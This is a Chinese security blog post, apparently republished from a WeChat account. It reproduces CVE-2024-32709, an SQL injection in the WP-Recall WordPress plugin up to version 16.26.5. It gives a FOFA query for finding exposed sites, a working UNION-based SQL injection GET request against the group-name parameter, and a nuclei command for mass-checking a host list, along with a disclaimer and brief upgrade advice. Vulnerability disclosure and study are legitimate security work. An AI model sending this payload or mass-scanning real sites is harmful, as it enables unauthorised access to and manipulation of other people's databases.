漏洞复现-CVE-2024-32709

admin 2024年7月15日13:16:35评论61 views字数 843阅读2分48秒阅读模式

:漏洞名称

WordPress WP-Recall SQL 注入漏洞

:漏洞描述

 WP-Recall 是一个WordPress插件,主要用于创建社区和会员制网站。它适合需要用户互动和内容分享的网站,例如社交网络、在线论坛、会员博客等。管理员可以通过设置和定制,创建一个功能完善且具有吸引力的网站,促进用户参与和内容创作。
漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素,造成数据库被恶意操作的风险。
漏洞影响版本
WordPress WP-Recall <= 16.26.5

:网络空间测绘查询

FOFA

"/wp-content/plugins/wp-recall/

漏洞复现-CVE-2024-32709

五:漏洞复现

poc
GET /account/?user=1&tab=groups&group-name=p%27+or+%27%%27=%27%%27+union+all+select+1,2,3,4,5,6,7,8,9,10,11,concat(%22Database:%22,md5(123456),0x7c),13--+- HTTP/1.1Host:User-Agent: Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36Connection: close

漏洞复现-CVE-2024-32709

SQL注入漏洞是一种常见的网络安全漏洞,它允许攻击者通过向应用程序的输入字段插入恶意的SQL语句来执行未经授权的数据库操作。SQL注入漏洞的原理主要涉及到应用程序对用户输入的信任过度以及对输入数据的不正确处理。
六:批量检测
nuclei.exe -t CVE-2024-32709.yaml -l host.txt
七:修复建议
建议更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-32709

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日13:16:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-CVE-2024-32709http://cn-sec.com/archives/2948037.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息